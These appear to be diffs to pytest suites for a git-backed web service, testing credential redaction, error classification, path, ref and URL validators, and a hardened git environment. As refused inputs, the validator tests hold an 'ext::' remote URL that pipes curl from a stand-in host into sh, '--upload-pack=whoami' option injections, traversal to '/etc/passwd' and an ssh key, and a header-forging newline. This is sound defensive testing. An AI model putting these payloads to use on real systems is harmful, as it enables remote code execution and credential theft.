+TOKEN = "ghp_16C7e42F292c6912E7710c838347Ae178B4a"
+
+
+@pytest.mark.parametrize("text", [
+    pytest.param(
+        f"fatal: unable to access 'https://octocat:{TOKEN}@github.com/o/r/': "
+        "The requested URL returned error: 403\n",
+        id="password-in-a-url"),
+    pytest.param(
+        f"fatal: could not read Username for 'https://x-access-token:{TOKEN}"
+        "@github.com': terminal prompts disabled\n",
+        id="installation-token-in-a-url"),
+    pytest.param(
+        f"remote: HTTP Basic: Access denied for token {TOKEN}\n",
+        id="token-on-its-own"),
+    pytest.param(
+        f"x-access-token:{TOKEN}\n", id="header-form-without-a-url"),
+])
+def test_a_credential_never_survives_redaction(text):
+    """Every shape the same token can arrive in, masked."""
+    assert TOKEN not in redact(text)
+
+
+def test_redaction_keeps_the_fact_that_makes_the_error_actionable():
+    """The host and the path stay: "which remote failed" is the answer."""
+    masked = redact(
+        f"fatal: unable to access 'https://octocat:{TOKEN}@github.com/o/r/': "
+        "The requested URL returned error: 403\n")
+
+    assert "github.com/o/r/" in masked
+    assert "https://***@github.com/o/r/" in masked
+    assert "The requested URL returned error: 403" in masked
+
+
+@pytest.mark.parametrize("prefix", ["ghp_", "github_pat_", "gho_", "ghs_",
+                                    "ghu_", "glpat-"])
+def test_every_published_token_prefix_is_masked(prefix):
+    """One row per issuer prefix: a new one must be added deliberately."""
+    assert redact(f"remote: rejected {prefix}AbC123_def-456 here") == (
+        "remote: rejected *** here")
+
+
+def test_redaction_leaves_ordinary_git_output_alone():
+    """It runs on EVERY error, so it may not damage the other 28 codes.
+
+    The two shapes that look like a credential and are not: an ssh remote
+    (``git@host:path`` -- a username, and the only thing that says which
+    host) and an email address, which the identity errors are about.
+    """
+    plain = ("fatal: repository 'git@github.com:owner/repo.git' not found\n"
+             "Author identity unknown: author@example.com\n")
+
+    assert redact(plain) == plain
+
+
+def test_redaction_masks_more_than_one_credential_in_one_line():
+    """A push failure prints the URL twice, and a mask that stops at the
+    first one is a leak with a plausible-looking body."""
+    masked = redact(f"https://a:{TOKEN}@h/x https://b:{TOKEN}@h/y")
+
+    assert masked == "https://***@h/x https://***@h/y"
+
+
+def test_redaction_survives_the_empty_string():
+    """It runs unconditionally on a message that a code may not have set."""
+    assert redact("") == ""

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -207,6 +207,8 @@ def test_the_ssh_split_is_the_row_order():
     "fatal: Authentication failed for 'https://github.com/a/b/'",
     "remote: HTTP Basic: Access denied",
     "remote: Invalid username or password.",
+    "remote: Invalid username or token. Password authentication is not "
+    "supported for Git operations.",
     # No "Could not read from remote repository" line under it: the phrase
     # has to be enough on its own, because a wrapper (or a future git) may
     # not print git's own summary line.
@@ -218,6 +220,16 @@ def test_the_ssh_split_is_the_row_order():
 def test_a_credential_phrase_is_enough_on_its_own(line):
     """Each phrase classifies by itself -- the row is an OR, not a recipe."""
     assert classify_failure(_ARGV, 128, line + "\n").code == "auth_required"
+
+
+@pytest.mark.parametrize("line", [
+    # git says this one on STDOUT, which is why classify_failure takes text
+    # and not a GitResult: the commit caller joins both streams.
+    "nothing to commit, working tree clean",
+    'no changes added to commit (use "git add" and/or "git commit -a")',
+])
+def test_either_way_of_saying_nothing_to_commit_is_enough(line):
+    assert classify_failure(_ARGV, 1, line + "\n").code == "nothing_to_commit"
 
 
 def test_a_local_permission_error_is_not_a_login_problem():
@@ -244,11 +256,69 @@ def test_an_unrecognised_failure_keeps_the_tail_of_stderr():
         f"line {n}" for n in range(50 - LAST_STDERR_LINES, 50)]
 
 
-def test_a_classified_failure_does_not_leak_stderr():
-    """A code the frontend can translate needs no raw English attached."""
+def test_a_classified_failure_keeps_the_evidence_too():
+    """A code is a CLAIM about what went wrong, and a claim with nothing
+    under it cannot be argued with.
+
+    This test used to assert the opposite -- that a translated code needs no
+    raw English attached -- and that premise was the defect: when the
+    classification is wrong (a hook's output caught by an ordinary English
+    phrase, say) the user got a confident wrong answer AND the sentence that
+    would have explained it was gone. What a route puts in the response body
+    is still the route's decision.
+    """
     error = classify_failure(_ARGV, 128, "fatal: Authentication failed for 'x'\n")
 
-    assert error.stderr is None
+    assert error.code == "auth_required"
+    assert error.stderr == "fatal: Authentication failed for 'x'"
+
+
+def test_stderr_that_says_nothing_is_reported_as_nothing():
+    """``rev-parse --verify --quiet`` fails silently by design. An empty tail
+    is the honest answer -- git failed and said nothing -- and it is still a
+    string, so a route never has to tell None and "" apart."""
+    error = classify_failure(_ARGV, 1, "")
+
+    assert error.code == "git_failed"
+    assert error.stderr == ""
+
+
+# --- hook output is not git output -----------------------------------------
+
+
+@pytest.mark.parametrize("stderr", [
+    pytest.param("ruff: command not found\n", id="linter-not-installed"),
+    pytest.param("node_modules/.bin/eslint: not found\n", id="tool-not-found"),
+    pytest.param("error: pre-commit hook: .venv does not exist\n",
+                 id="hook-missing-venv"),
+    pytest.param("error: cannot lock ref: reference already exists\n",
+                 id="not-a-branch-that-exists"),
+])
+def test_a_failing_hook_is_not_a_missing_object(stderr):
+    """``commit`` runs the user's hooks, and their output lands on this same
+    stream. "not found" from a lint hook must not become "git found no such
+    object or path" -- an answer that is wrong, confident, and (before the
+    tail was kept) unaccompanied by the line that explains it.
+
+    ``error: `` is deliberately not one of the prefixes that anchors a
+    phrase: git uses it for what it can carry on past, and a hook uses it
+    for everything.
+    """
+    error = classify_failure(_ARGV, 1, stderr)
+
+    assert error.code == "git_failed"
+    assert error.stderr == stderr.strip()
+
+
+@pytest.mark.parametrize("stderr,code", [
+    ("fatal: path 'x' does not exist in 'HEAD'\n", "not_found"),
+    ("fatal: repository 'https://github.com/a/b.git' not found\n", "not_found"),
+    ("remote: Repository not found.\n", "not_found"),
+    ("fatal: a branch named 'feat' already exists\n", "branch_exists"),
+])
+def test_an_anchored_phrase_still_catches_git_saying_it(stderr, code):
+    """The anchor narrows WHO is speaking, not what git means."""
+    assert classify_failure(_ARGV, 128, stderr).code == code
 
 
 def test_the_failing_subcommand_is_named():

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -490,6 +490,30 @@ def test_redaction_masks_more_than_one_credential_in_one_line():
     assert masked == "https://***@h/x https://***@h/y"
 
 
+def test_an_unencoded_at_sign_in_a_password_does_not_end_the_mask():
+    """A URL splits its authority at the LAST ``@``, so the mask must too.
+
+    ``https://user:p@ss@github.com/o/r`` is a URL git accepts and prints
+    back verbatim. A mask that stopped at the FIRST ``@`` left
+    ``https://***@ss@github.com/o/r`` -- half the password, in a string
+    that still looks redacted, which is worse than not masking at all.
+    """
+    assert redact("https://user:p@ss@github.com/o/r") == (
+        "https://***@github.com/o/r")
+
+
+def test_the_mask_never_runs_past_the_authority():
+    """Greedy to the last ``@`` before a slash or a space, and no further.
+
+    The pin for the class that made the test above pass: it may not swallow
+    a path segment containing an ``@``, and it may not join two URLs on one
+    line into a single match.
+    """
+    assert redact("https://a:pw@h/x@y") == "https://***@h/x@y"
+    assert redact("https://a:p@w@h/x https://b:p@w@h/y") == (
+        "https://***@h/x https://***@h/y")
+
+
 def test_redaction_survives_the_empty_string():
     """It runs unconditionally on a message that a code may not have set."""
     assert redact("") == ""

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -140,6 +140,29 @@ _SAMPLES = [
     pytest.param(
         "fatal: bad revision 'refs/heads/gone'\n",
         "not_found", id="bad-revision"),
+    # The next four are git 2.53's own words for the G1 read operations,
+    # copied off a real run: opening a file at a ref where it does not
+    # exist is the most ordinary miss the tab can produce, and none of the
+    # phrases above it says so.
+    pytest.param(
+        "fatal: path 'no/such/file' does not exist in 'HEAD'\n",
+        "not_found", id="missing-path-at-a-ref"),
+    pytest.param(
+        "fatal: path 'no/such/file' does not exist (neither on disk nor in "
+        "the index)\n",
+        "not_found", id="missing-path-in-the-index"),
+    pytest.param(
+        "fatal: invalid object name 'nosuchref'.\n",
+        "not_found", id="unknown-ref"),
+    pytest.param(
+        "fatal: Needed a single revision\n",
+        "not_found", id="unverifiable-sha"),
+    pytest.param(
+        "error: No such remote 'nope'\n",
+        "not_found", id="unknown-remote"),
+    pytest.param(
+        "error: stash@{9} is not a valid reference\n",
+        "not_found", id="unknown-stash"),
     pytest.param(
         "error: could not lock config file .git/config: File exists\n",
         "git_failed", id="unrecognised"),

--- a/backend/tests/test_git_paths.py
+++ b/backend/tests/test_git_paths.py
@@ -76,6 +76,11 @@ def test_a_path_need_not_exist(tmp_path):
     pytest.param("/etc/passwd", id="absolute"),
     pytest.param("//server/share/x", id="unc"),
     pytest.param("C:/Windows/System32/drivers/etc/hosts", id="drive-letter"),
+    # A colon anywhere, not only as a drive letter: on Windows ``ab:c.txt``
+    # is the alternate data stream ``c.txt`` of the file ``ab``, which is not
+    # the file the path appears to name.
+    pytest.param("ab:c.txt", id="alternate-data-stream"),
+    pytest.param("sub/a:b", id="colon-in-a-segment"),
     pytest.param("src\\main.py", id="backslash"),
     pytest.param("-rf", id="looks-like-an-option"),
     pytest.param("./-rf", id="looks-like-an-option-after-normalising"),

--- a/backend/tests/test_git_paths.py
+++ b/backend/tests/test_git_paths.py
@@ -1,0 +1,314 @@
+"""What the browser is allowed to name, and what it is not.
+
+Every value here ends up on a git command line. There is no shell, so
+nothing can be "escaped into" a second command -- but git's own command
+line is dangerous enough on its own: an argument starting with ``-`` is an
+OPTION, and ``--upload-pack=`` runs one. And a path is a second kind of
+boundary: the tab reads and writes the OPEN PROJECT, so ``../../.ssh/id_rsa``
+has to stop here rather than at the filesystem's permissions.
+
+These are closed grammars, so the tests are written the same way round: a
+few things that must pass, and a lot of things that must not.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from app.core.git.errors import GitError
+from app.core.git.paths import (
+    MAX_PATHS,
+    is_env_secret_path,
+    validate_branch_name,
+    validate_commit_message,
+    validate_identity,
+    validate_rel_path,
+    validate_rel_paths,
+    validate_remote_name,
+    validate_remote_url,
+    validate_sha,
+    validate_stash_message,
+)
+
+
+def _refused(call, *args, **kwargs) -> GitError:
+    """Run *call* expecting a 400, and hand the error back for its code."""
+    with pytest.raises(GitError) as excinfo:
+        call(*args, **kwargs)
+    assert excinfo.value.status == 400
+    return excinfo.value
+
+
+# --- paths -----------------------------------------------------------------
+
+
+@pytest.mark.parametrize("path,normalised", [
+    ("a.txt", "a.txt"),
+    ("src/main.py", "src/main.py"),
+    ("./src/main.py", "src/main.py"),
+    ("src//main.py", "src/main.py"),
+    ("src/", "src"),
+    ("my notes/two words.txt", "my notes/two words.txt"),
+    # No quoting anywhere in this pipeline (``core.quotepath=false`` plus
+    # ``-z``), so a CJK filename is an ordinary filename.
+    ("\u8cc7\u6599/\u8a13\u7df4.csv", "\u8cc7\u6599/\u8a13\u7df4.csv"),
+])
+def test_a_relative_path_comes_back_normalised(tmp_path, path, normalised):
+    """One spelling per file: two entries for the same path in one request
+    would be two operations on it, and the status output only knows one."""
+    assert validate_rel_path(tmp_path, path) == normalised
+
+
+def test_a_path_need_not_exist(tmp_path):
+    """A deleted file is exactly what "discard" and "stage" are for."""
+    assert validate_rel_path(tmp_path, "gone/for/good.txt") == "gone/for/good.txt"
+
+
+@pytest.mark.parametrize("path", [
+    pytest.param("", id="empty"),
+    pytest.param(".", id="dot"),
+    pytest.param("..", id="parent"),
+    pytest.param("a/../../b", id="climbs-out"),
+    # This one lands back INSIDE the project, so the containment check would
+    # pass it. It is refused anyway: git would read it as "b", and nothing
+    # would then match it against the path "b" in the status output.
+    pytest.param("a/../b", id="climbs-and-comes-back"),
+    pytest.param("/etc/passwd", id="absolute"),
+    pytest.param("//server/share/x", id="unc"),
+    pytest.param("C:/Windows/System32/drivers/etc/hosts", id="drive-letter"),
+    pytest.param("src\\main.py", id="backslash"),
+    pytest.param("-rf", id="looks-like-an-option"),
+    pytest.param("./-rf", id="looks-like-an-option-after-normalising"),
+    pytest.param("--upload-pack=whoami", id="is-an-option"),
+    pytest.param("a\x00b", id="nul"),
+    pytest.param("a\nb", id="newline"),
+])
+def test_a_path_that_is_not_one_is_refused(tmp_path, path):
+    assert _refused(validate_rel_path, tmp_path, path).code == "invalid_path"
+
+
+def test_an_absolute_path_inside_the_project_is_still_refused(tmp_path):
+    """The containment check cannot catch this one -- the path IS inside the
+    root -- so the shape check has to. Same reason as ``a/../b``: git would
+    accept the absolute pathspec, and the status output calls it ``a.txt``.
+
+    On Windows this is the drive-letter rule doing the work (``D:/...``) and
+    on POSIX the leading-slash one; the request is refused either way.
+    """
+    (tmp_path / "a.txt").write_text("x", encoding="utf-8")
+
+    error = _refused(validate_rel_path, tmp_path, f"{tmp_path.as_posix()}/a.txt")
+
+    assert error.code == "invalid_path"
+
+
+def test_a_symlink_out_of_the_project_is_refused(tmp_path):
+    """The shape checks cannot see this one: the path has no ``..`` in it and
+    is relative. Resolving both sides is what catches it."""
+    root = tmp_path / "project"
+    root.mkdir()
+    outside = tmp_path / "secrets.txt"
+    outside.write_text("token", encoding="utf-8")
+    try:
+        (root / "link.txt").symlink_to(outside)
+    except (OSError, NotImplementedError):
+        pytest.skip("this platform does not allow creating symlinks here")
+
+    assert _refused(validate_rel_path, root, "link.txt").code == "invalid_path"
+
+
+def test_a_symlink_inside_the_project_is_fine(tmp_path):
+    root = tmp_path / "project"
+    (root / "data").mkdir(parents=True)
+    (root / "data" / "real.csv").write_text("a,b", encoding="utf-8")
+    try:
+        (root / "link.csv").symlink_to(root / "data" / "real.csv")
+    except (OSError, NotImplementedError):
+        pytest.skip("this platform does not allow creating symlinks here")
+
+    assert validate_rel_path(root, "link.csv") == "link.csv"
+
+
+def test_a_list_of_paths_is_capped(tmp_path):
+    """Past a few hundred the user meant "all", which has its own argv."""
+    assert len(validate_rel_paths(tmp_path, [f"f{n}.txt" for n in range(MAX_PATHS)])) \
+        == MAX_PATHS
+    error = _refused(validate_rel_paths, tmp_path,
+                     [f"f{n}.txt" for n in range(MAX_PATHS + 1)])
+    assert error.code == "invalid_path"
+
+
+def test_an_empty_list_of_paths_is_refused(tmp_path):
+    """``git add -A --`` with no pathspec stages the WHOLE tree, and
+    ``clean -f --`` deletes it. "Nothing selected" must never arrive as
+    "everything"."""
+    assert _refused(validate_rel_paths, tmp_path, []).code == "invalid_path"
+
+
+def test_one_bad_path_refuses_the_whole_list(tmp_path):
+    """Half a staging operation is worse than none."""
+    _refused(validate_rel_paths, tmp_path, ["ok.txt", "../etc/passwd"])
+
+
+# --- refs ------------------------------------------------------------------
+
+
+@pytest.mark.parametrize("name", ["main", "feat/ok", "release-2.5", "v1.0.x",
+                                  "\u4e3b\u8981"])
+def test_a_branch_name_is_accepted(name):
+    assert validate_branch_name(name) == name
+
+
+@pytest.mark.parametrize("name", [
+    pytest.param("", id="empty"),
+    pytest.param("bad name", id="space"),
+    pytest.param("-x", id="leading-dash"),
+    pytest.param("--upload-pack=whoami", id="is-an-option"),
+    pytest.param("@origin", id="leading-at"),
+    # ``main@{1}`` is a perfectly valid ref -- the reflog of main -- which
+    # makes it exactly the wrong thing to accept as a branch NAME.
+    pytest.param("a@{1}", id="reflog-syntax"),
+    pytest.param("a\tb", id="tab"),
+    pytest.param("a\x01b", id="control"),
+    pytest.param("x" * 256, id="far-too-long"),
+])
+def test_a_branch_name_that_is_not_one_is_refused(name):
+    assert _refused(validate_branch_name, name).code == "invalid_ref"
+
+
+@pytest.mark.parametrize("name", ["origin", "upstream", "fork-2", "a.b_c"])
+def test_a_remote_name_is_accepted(name):
+    assert validate_remote_name(name) == name
+
+
+@pytest.mark.parametrize("name", ["", "-x", "a b", ".hidden", "a/b", "x" * 65])
+def test_a_remote_name_that_is_not_one_is_refused(name):
+    assert _refused(validate_remote_name, name).code == "invalid_value"
+
+
+@pytest.mark.parametrize("sha,canonical", [
+    ("deadbee", "deadbee"),
+    ("0" * 40, "0" * 40),
+    # A paste out of a UI that shows upper-case hex is still a commit id.
+    ("DEADBEEF", "deadbeef"),
+    ("  deadbee\n", "deadbee"),
+])
+def test_a_commit_id_is_accepted(sha, canonical):
+    assert validate_sha(sha) == canonical
+
+
+@pytest.mark.parametrize("sha", ["", "dead", "z" * 7, "0" * 41, "HEAD",
+                                 "dead beef"])
+def test_a_commit_id_that_is_not_one_is_refused(sha):
+    assert _refused(validate_sha, sha).code == "invalid_ref"
+
+
+# --- URLs ------------------------------------------------------------------
+
+
+@pytest.mark.parametrize("url", [
+    "https://github.com/owner/repo.git",
+    "ssh://git@github.com/owner/repo.git",
+    "file:///srv/mirrors/repo.git",
+    "git@github.com:owner/repo.git",
+])
+def test_a_remote_url_is_accepted(url):
+    assert validate_remote_url(url) == url
+
+
+@pytest.mark.parametrize("url", [
+    # ``ext::`` is not a location, it is a command line git runs.
+    pytest.param("ext::sh -c 'curl evil.example/$0|sh'", id="ext-transport"),
+    pytest.param("fd::7", id="fd-transport"),
+    pytest.param("-upload-pack=whoami", id="leading-dash"),
+    pytest.param("http://github.com/owner/repo.git", id="plaintext-http"),
+    pytest.param("git://github.com/owner/repo.git", id="git-protocol"),
+    pytest.param("https://github.com/owner/re po.git", id="inner-space"),
+    pytest.param(" https://github.com/owner/repo.git", id="leading-space"),
+    pytest.param("https://github.com/owner/repo.git\n", id="trailing-newline"),
+    pytest.param("", id="empty"),
+    pytest.param("/srv/mirrors/repo.git", id="bare-path"),
+])
+def test_a_remote_url_that_is_not_allowed_is_refused(url):
+    assert _refused(validate_remote_url, url).code == "invalid_url"
+
+
+# --- messages and identity -------------------------------------------------
+
+
+def test_a_commit_message_keeps_its_body():
+    """Subject, blank line, body -- the one multi-line value here."""
+    assert validate_commit_message("  feat: add a node\n\nWhy: because\n  ") \
+        == "feat: add a node\n\nWhy: because"
+
+
+@pytest.mark.parametrize("message", ["", "   \n  ", "x" * 10_001, "a\x00b"])
+def test_a_commit_message_that_is_not_usable_is_refused(message):
+    assert _refused(validate_commit_message, message).code == "invalid_value"
+
+
+def test_a_commit_message_may_be_long():
+    assert len(validate_commit_message("x" * 10_000)) == 10_000
+
+
+def test_a_stash_message_is_one_line():
+    assert validate_stash_message("  wip: the loss curve  ") == "wip: the loss curve"
+
+
+@pytest.mark.parametrize("message", ["", "   ", "two\nlines", "x" * 501])
+def test_a_stash_message_that_is_not_one_line_is_refused(message):
+    assert _refused(validate_stash_message, message).code == "invalid_value"
+
+
+def test_an_identity_is_stripped_and_optional():
+    assert validate_identity("  Ada Lovelace ", "ada@example.com") == \
+        ("Ada Lovelace", "ada@example.com")
+    assert validate_identity(name="Ada") == ("Ada", None)
+    assert validate_identity() == (None, None)
+
+
+@pytest.mark.parametrize("name,email", [
+    pytest.param("", None, id="blank-name"),
+    pytest.param("  ", None, id="whitespace-name"),
+    pytest.param("-Ada", None, id="name-starts-with-a-dash"),
+    # A newline in a name would forge a second header line in the commit
+    # object git writes.
+    pytest.param("Ada\nCommitter: Eve <eve@example.com>", None, id="newline-name"),
+    pytest.param("x" * 256, None, id="name-too-long"),
+    pytest.param(None, "not-an-email", id="email-without-at"),
+    pytest.param(None, "-a@example.com", id="email-starts-with-a-dash"),
+    pytest.param(None, "a@example.com\nx", id="newline-email"),
+    pytest.param(None, "", id="blank-email"),
+])
+def test_an_identity_that_is_not_one_is_refused(name, email):
+    assert _refused(validate_identity, name, email).code == "invalid_value"
+
+
+# --- the .env guard --------------------------------------------------------
+
+
+@pytest.mark.parametrize("path", [
+    ".env",
+    ".env.local",
+    ".env.production",
+    "sub/.env",
+    "a/b/.env.local",
+    # Windows and macOS filesystems are case-insensitive: ``.ENV`` is the
+    # same file, and a guard that only knew the lowercase spelling would
+    # hand it over.
+    ".ENV",
+])
+def test_a_dotenv_file_is_a_secret(path):
+    assert is_env_secret_path(path) is True
+
+
+@pytest.mark.parametrize("path", [
+    ".env.example",
+    "sub/.env.example",
+    "env.txt",
+    "environment.yml",
+    ".environment",
+    "src/main.py",
+])
+def test_everything_else_is_not(path):
+    assert is_env_secret_path(path) is False

--- a/backend/tests/test_git_runner.py
+++ b/backend/tests/test_git_runner.py
@@ -202,11 +202,27 @@ def test_env_is_non_interactive(monkeypatch, fake_git):
 
     assert env["GIT_TERMINAL_PROMPT"] == "0"
     assert env["GCM_INTERACTIVE"] == "never"
+    assert env["GIT_ASKPASS"] == ""
     assert env["SSH_ASKPASS_REQUIRE"] == "never"
     assert env["GIT_EDITOR"] == ":"
     assert env["GIT_SEQUENCE_EDITOR"] == ":"
     assert env["LC_ALL"] == "C"
     assert env["GIT_ALLOW_PROTOCOL"] == "https:ssh:file"
+
+
+def test_an_inherited_askpass_helper_is_emptied(monkeypatch, fake_git):
+    """The variable beats ``-c core.askPass=``, so it has to be overwritten.
+
+    VS Code exports a ``GIT_ASKPASS`` into every terminal it opens, which is
+    where a developer starts this server; git reads the variable before the
+    config and never looks at the config when it is set. Inherited, it would
+    open a dialog on the server's own screen and hold the request until
+    somebody clicked it. Empty is git's own spelling of "no helper", and it
+    ends the chain rather than passing the question to ``SSH_ASKPASS``.
+    """
+    monkeypatch.setenv("GIT_ASKPASS", "C:/Program Files/VSCode/askpass.sh")
+
+    assert runner.git_env()["GIT_ASKPASS"] == ""
 
 
 @pytest.mark.parametrize("name", runner.REPOSITORY_ENV_VARS)

--- a/backend/tests/test_git_runner.py
+++ b/backend/tests/test_git_runner.py
@@ -291,6 +291,23 @@ def test_ssh_probe_failure_is_not_fatal(monkeypatch):
     assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
 
 
+def test_a_probe_that_could_not_run_is_not_remembered(monkeypatch):
+    """A guess must not outlive the thing that caused it.
+
+    If git was missing when the question was first asked, the fallback is
+    right for that moment -- and wrong forever after, because it would go on
+    overriding a ``core.sshCommand`` the user really has.
+    """
+    monkeypatch.setattr(runner, "git_executable", lambda: None)
+    monkeypatch.delenv("GIT_SSH_COMMAND", raising=False)
+    assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
+
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    _fake_popen(monkeypatch, _FakeProc(stdout=b"ssh -i C:/keys/id_ed25519\n"))
+
+    assert "GIT_SSH_COMMAND" not in runner.git_env()
+
+
 def test_read_only_skips_the_index_lock(monkeypatch, fake_git):
     """A status poll must not fight a real operation for the index lock."""
     assert "GIT_OPTIONAL_LOCKS" not in runner.git_env()

--- a/backend/tests/test_git_runner.py
+++ b/backend/tests/test_git_runner.py
@@ -110,12 +110,17 @@ def test_argv_is_the_fixed_prefix_then_the_callers_arguments(
     ``core.askPass=`` is the one that is easy to lose and impossible to
     notice: without it, a machine with a credential helper configured opens
     a dialog on the SERVER and the request hangs until someone answers it.
+
+    ``--literal-pathspecs`` is the one that is easy to lose and DANGEROUS:
+    without it the paths after ``--`` are patterns, so a request naming
+    ``[.]env`` or ``*`` gets a file nobody validated.
     """
     _, seen = _run(monkeypatch, _FakeProc(),
                    ("add", "-A", "--", "src/a.txt", "b.txt"), cwd=tmp_path)
 
     assert seen["argv"] == [
         _GIT, "-C", str(tmp_path.resolve()),
+        "--literal-pathspecs",
         "-c", "core.quotepath=false",
         "-c", "core.askPass=",
         "-c", "color.ui=never",

--- a/backend/tests/test_git_runner.py
+++ b/backend/tests/test_git_runner.py
@@ -1,0 +1,535 @@
+"""Starting a git process on behalf of a browser request.
+
+This is the only place in the app that spawns git, so it is the only place
+that can get these wrong -- and each of them fails somewhere else, long
+after the call that caused it:
+
+* an argument that reaches git as an OPTION rather than as a path or a ref;
+* a git that decides to ask for a password, on a server with no terminal,
+  and never returns;
+* ``text=True``, which would rewrite the CRLF inside a diff and crash on a
+  file that is not UTF-8;
+* an inherited ``GIT_DIR``, which would silently point every command at
+  another repository;
+* a timeout that leaves git (and the ssh it started) running, holding the
+  index lock the next request needs.
+
+No test here starts a real process: ``subprocess.Popen`` is replaced with a
+fake, following ``test_packs_runner.py``.
+"""
+
+from __future__ import annotations
+
+import subprocess
+import sys
+import types
+from pathlib import Path
+
+import pytest
+
+from app.core.git import runner
+from app.core.git.errors import GitError
+from app.core.packs import runner as packs_runner
+
+#: Where the fake git lives. Any absolute-looking string will do; it only
+#: has to be recognisable in an argv assertion.
+_GIT = "C:/Program Files/Git/cmd/git.exe"
+
+
+class _FakeProc:
+    """A finished (or hung) git process, without the process."""
+
+    def __init__(self, *, stdout: bytes = b"", stderr: bytes = b"",
+                 returncode: int = 0, hangs: bool = False):
+        self._stdout = stdout
+        self._stderr = stderr
+        self._returncode = returncode
+        self._hangs = hangs
+        self.pid = 4242
+        self.returncode: int | None = None
+        self.communicate_calls: list[tuple] = []
+
+    def communicate(self, data=None, timeout=None):
+        self.communicate_calls.append((data, timeout))
+        if self._hangs and len(self.communicate_calls) == 1:
+            raise subprocess.TimeoutExpired(cmd="git", timeout=timeout or 0)
+        self.returncode = self._returncode
+        return self._stdout, self._stderr
+
+
+def _fake_popen(monkeypatch, proc: _FakeProc) -> dict:
+    """Install *proc* as the next ``Popen`` result; returns the recorded call."""
+    seen: dict = {}
+
+    def _popen(argv, **kwargs):
+        seen["argv"] = argv
+        seen["kwargs"] = kwargs
+        return proc
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+    return seen
+
+
+@pytest.fixture(autouse=True)
+def _fresh_caches():
+    """Every cache in the runner is process-wide; no test may inherit one."""
+    runner._reset_for_tests()
+    yield
+    runner._reset_for_tests()
+
+
+@pytest.fixture
+def fake_git(monkeypatch):
+    """git is on PATH, and the ssh question is already answered.
+
+    The probe for ``core.sshCommand`` is a git call of its own, so a test
+    that is not about it would otherwise consume the fake ``Popen`` before
+    the command under test got there. Its own tests below run it for real.
+    """
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.setattr(runner, "_ssh_command_configured", lambda: True)
+
+
+def _run(monkeypatch, proc: _FakeProc, args=("status", "--porcelain=v2"),
+         *, cwd: Path | None = None, **kwargs):
+    """Call ``run_git`` against *proc*; returns ``(result, recorded call)``."""
+    seen = _fake_popen(monkeypatch, proc)
+    result = runner.run_git(list(args), cwd=cwd or Path.cwd(), timeout=10,
+                            **kwargs)
+    return result, seen
+
+
+# --- the command line ------------------------------------------------------
+
+
+def test_argv_is_the_fixed_prefix_then_the_callers_arguments(
+        monkeypatch, fake_git, tmp_path):
+    """The exact command line, including where the caller's ``--`` lands.
+
+    ``core.askPass=`` is the one that is easy to lose and impossible to
+    notice: without it, a machine with a credential helper configured opens
+    a dialog on the SERVER and the request hangs until someone answers it.
+    """
+    _, seen = _run(monkeypatch, _FakeProc(),
+                   ("add", "-A", "--", "src/a.txt", "b.txt"), cwd=tmp_path)
+
+    assert seen["argv"] == [
+        _GIT, "-C", str(tmp_path.resolve()),
+        "-c", "core.quotepath=false",
+        "-c", "core.askPass=",
+        "-c", "color.ui=never",
+        "add", "-A", "--", "src/a.txt", "b.txt",
+    ]
+
+
+def test_argv_carries_the_resolved_cwd(monkeypatch, fake_git, tmp_path):
+    """``-C`` is an absolute path with no ``..`` left in it."""
+    sub = tmp_path / "sub"
+    sub.mkdir()
+
+    _, seen = _run(monkeypatch, _FakeProc(), cwd=sub / "..")
+
+    assert seen["argv"][1:3] == ["-C", str(tmp_path.resolve())]
+
+
+def test_never_uses_a_shell(monkeypatch, fake_git):
+    """A shell here would turn a branch name into a command."""
+    _, seen = _run(monkeypatch, _FakeProc())
+
+    assert "shell" not in seen["kwargs"]
+    assert isinstance(seen["argv"], list)
+
+
+def test_pipes_are_binary(monkeypatch, fake_git):
+    """No text mode: git output is bytes, and both callers decode it once.
+
+    ``text=True`` would translate the CRLF inside a diff hunk (making the
+    patch describe a change that is not there) and raise on a file that is
+    not valid UTF-8.
+    """
+    _, seen = _run(monkeypatch, _FakeProc())
+
+    kwargs = seen["kwargs"]
+    assert "text" not in kwargs
+    assert "universal_newlines" not in kwargs
+    assert "encoding" not in kwargs
+    assert kwargs["stdout"] == subprocess.PIPE
+    assert kwargs["stderr"] == subprocess.PIPE
+
+
+def test_stdin_is_devnull_without_input(monkeypatch, fake_git):
+    """A git that reads stdin gets EOF, not a wait with nobody typing."""
+    _, seen = _run(monkeypatch, _FakeProc())
+
+    assert seen["kwargs"]["stdin"] == subprocess.DEVNULL
+
+
+def test_input_bytes_go_to_stdin(monkeypatch, fake_git):
+    """A commit message travels on stdin, never as an argument."""
+    proc = _FakeProc()
+
+    _, seen = _run(monkeypatch, proc, ("commit", "-q", "--file=-"),
+                   input_bytes="fix: \u4fee\u6b63".encode())
+
+    assert seen["kwargs"]["stdin"] == subprocess.PIPE
+    assert proc.communicate_calls[0][0] == "fix: \u4fee\u6b63".encode()
+
+
+def test_popen_is_not_given_a_cwd(monkeypatch, fake_git, tmp_path):
+    """``-C`` does the job, and a ``cwd=`` would confuse two failures.
+
+    A directory Popen cannot enter raises ``FileNotFoundError`` -- the same
+    exception a missing git raises -- and would be reported as "git is not
+    installed" on a machine where it plainly is.
+    """
+    _, seen = _run(monkeypatch, _FakeProc(), cwd=tmp_path)
+
+    assert "cwd" not in seen["kwargs"]
+
+
+# --- the environment -------------------------------------------------------
+
+
+def test_env_is_non_interactive(monkeypatch, fake_git):
+    """Every variable that turns a question into an immediate failure."""
+    env = runner.git_env()
+
+    assert env["GIT_TERMINAL_PROMPT"] == "0"
+    assert env["GCM_INTERACTIVE"] == "never"
+    assert env["SSH_ASKPASS_REQUIRE"] == "never"
+    assert env["GIT_EDITOR"] == ":"
+    assert env["GIT_SEQUENCE_EDITOR"] == ":"
+    assert env["LC_ALL"] == "C"
+    assert env["GIT_ALLOW_PROTOCOL"] == "https:ssh:file"
+
+
+@pytest.mark.parametrize("name", runner.REPOSITORY_ENV_VARS)
+def test_env_drops_the_repository_variables(monkeypatch, fake_git, name):
+    """Any of these would move every command to another repository.
+
